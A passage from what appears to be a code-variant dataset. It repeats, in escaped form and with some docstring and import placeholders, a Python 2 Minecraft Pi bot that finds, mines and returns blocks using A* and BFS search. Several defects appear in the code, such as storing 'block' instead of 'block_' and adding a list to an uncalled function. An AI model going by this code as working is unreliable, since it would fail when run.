rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({\n 'func': '_place',\n 'args': (imag_bot.get_pos() + player_loc) / 2,\n 'kwargs': {'block': block_id}\n })\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n 
for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z) \\\n and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and \\\n abs(diff.x) + abs(diff.z) == 2 and \\\n state.get_block(self._player_loc + diff/2 + _Vec3(0, -1, 0)) not in \\\n (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n\n # If man == dy: return man + 1\n # If man > dy: return man\n # If man < dy: return dy?\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n\n if y_diff == 0:\n return man_dist\n\n # Transform so that it's only dropping\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n\n drops = _drops(y_diff, drop)\n\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n \n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. 
Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n \n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = (bot.x, bot.z)\n\n y_diff = bot_pos.y - player_pos.y\n\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n\n", "<docstring token>\nfrom copy import deepcopy\nfrom time import sleep\nimport mcpi.minecraft as minecraft\nfrom mcpi.vec3 import Vec3\nimport mcpi.block as block\nfrom search import SearchProblem, astar, bfs\nfrom singleton import singleton\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n_DROP = 2\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. 
Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot.x, bot.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n_AIR = block.AIR.id\n_WATER = block.WATER.id\n_LAVA = block.LAVA.id\n_BEDROCK = block.BEDROCK.id\n_DROP = 2\n_DROP_PLUS_1 = _DROP + 1\n_DELAY = 1\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block_ is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n return rtn\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 